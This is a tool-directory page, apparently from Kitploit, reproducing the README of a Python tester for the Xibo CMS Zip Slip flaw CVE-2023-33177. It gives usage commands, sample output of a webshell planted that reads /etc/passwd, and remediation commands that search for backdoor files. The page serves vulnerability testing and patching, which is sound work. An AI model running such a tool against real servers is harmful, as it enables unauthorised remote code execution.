Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
-CVE-2023-33177- — Xibo CMS CVE-2023-33177 脆弱性テスター | Kitploit
ツール/GitHubGitHub/kaxm23/-cve-2023-33177-
偵察脆弱性スキャナーエクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubkaxm23/-cve-2023-33177-

-CVE-2023-33177-

Xibo CMS CVE-2023-33177 脆弱性テスター

リポジトリを見る
5ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Xibo CMS CVE-2023-33177 脆弱性テスター

Python 3.6+ License

CVE-2023-33177 の自動セキュリティテストツール - Xibo CMS の Zip Slip パストラバーサル脆弱性によりリモートコード実行 (RCE) が可能になります。

⚠️ 免責事項

このツールは教育および許可されたテスト目的のみに使用してください。 自分が所有している、または明示的なテスト許可を得ているシステムでのみ使用してください。 無許可のテストは違法であり、非倫理的です。

📋 説明

Xibo CMS バージョン 1.8.0-2.3.16 および 3.0.0-3.3.4 は、レイアウトインポート機能を介したパストラバーサル攻撃に対して脆弱です。このツールは、無害なテストファイルの書き込みを試みることで、Xibo インスタンスが脆弱かどうかを安全にテストします。

脆弱性の詳細

  • CVE ID: CVE-2023-33177
  • タイプ: Zip Slip パストラバーサル → リモートコード実行
  • 影響: 認証済み攻撃者がWebサーバーに任意のファイルを書き込める
  • 修正: Xibo CMS 3.3.5+ または 2.3.17+ にアップグレード

🚀 機能

  • ✅ 非破壊的テスト(検証のため /etc/passwd のみ読み取り)
  • ✅ 自動認証処理
  • ✅ 安全なペイロード生成
  • ✅ 明確な脆弱性レポート
  • ✅ テストファイルの自動クリーンアップ
  • ✅ HTTP/HTTPS 対応

📦 インストール

## Clone the repository
git clone [email protected]/kaxm23/-CVE-2023-33177-.git
cd xibo-cve-2023-33177-tester

## Install requirements
pip install -r requirements.txt

Basic Command Structure

python test_cve_2023_33177.py <URL> <username> <password>

実用的な例

## Local development instance
python test_cve_2023_33177.py http://localhost/xibo admin password123

## Remote production with HTTPS
python test_cve_2023_33177.py https://xibo.example.com [email protected] SecurePass2024!

## Custom port and path
python test_cve_2023_33177.py http://192.168.1.100:8080/xibo admin mypassword

## Without trailing slash (script handles it)
python test_cve_2023_33177.py https://example.com/xibo admin pass

出力例 - 脆弱性あり

[*] Testing Xibo CMS at http://localhost/xibo
[*] CVE-2023-33177 - Zip Slip RCE Test

[+] Created test payload: test_vuln_1703123456.zip
[+] Successfully logged in as admin
[*] Attempting to import malicious layout...
[*] Import response: HTTP 200
[*] Checking for webshell...
[!] VULNERABLE! Webshell accessible at: http://localhost/security_test.php
[+] Successfully read /etc/passwd
[*] Output preview: VULN_TEST_root:x:0:0:root:/root:/bin/bash...

[!] Website IS VULNERABLE to CVE-2023-33177!
[!] Remediation: Update Xibo CMS to version 3.3.5+ or 2.3.17+
[!] Delete the test file: security_test.php

出力例 - 脆弱性なし

[*] Testing Xibo CMS at http://localhost/xibo
[*] CVE-2023-33177 - Zip Slip RCE Test

[+] Created test payload: test_vuln_1703123456.zip
[+] Successfully logged in as admin
[*] Attempting to import malicious layout...
[*] Import response: HTTP 200
[*] Checking for webshell...
[-] Webshell not found (HTTP 404)

[+] Website appears NOT vulnerable (or path differs)

🛡️ 修復ガイド

## Download latest version
wget https://github.com/xibosignage/xibo-cms/releases/latest

## Follow upgrade instructions
## https://xibo.org.uk/manual/en/upgrade.html

2. 侵害の確認

## Find recently modified PHP files in web root
find /var/www/html -name "*.php" -mtime -7 -type f

## Check for suspicious files
find /var/www/html -name "shell.php" -o -name "cmd.php" -o -name "backdoor.php"

## Review access logs for unauthorized imports
grep "layout/import" /var/log/apache2/access.log

3. 認証情報のローテーション

Change all CMS user passwords

Rotate API keys and tokens

Review and remove unauthorized user accounts

`
📋 Requirements
Python 3.6 or higher

requests library (install via pip)

Valid Xibo CMS credentials (authentication required)

Network access to target Xibo instance

🤝 貢献

Contributions are welcome! Please follow these guidelines:

Fork the repository

Create a feature branch: git checkout -b feature/amazing-feature

Commit changes: git commit -m 'Add amazing feature'

Push to branch: git push origin feature/amazing-feature

Open a Pull Request

Contribution Requirements
Code must follow PEP 8 standards

Testing must remain non-destructive

Documentation must be updated

No live testing against unauthorized targets

📄 ライセンス

This project is licensed under the MIT License - see the LICENSE file for details.

⚖️ Legal & Ethical Use
By using this tool, you agree to:

Only test systems you own or have explicit written permission to test

Comply with all local, state, and federal laws

Not use this tool for malicious purposes

Report vulnerabilities responsibly to vendors

Accept full responsibility for your actions

🔗 参考文献

CVE-2023-33177 NVD Entry

Xibo Security Advisories

Zip Slip Vulnerability Details

OWASP Path Traversal Guide

📞 サポートと連絡先

Issues: GitHub Issues

Security Reports: Please disclose responsibly via GitHub private vulnerability reporting

Questions: Open a discussion on GitHub

⭐ スター履歴

If this tool helped you, please consider starring the repository!
ツールをダウンロード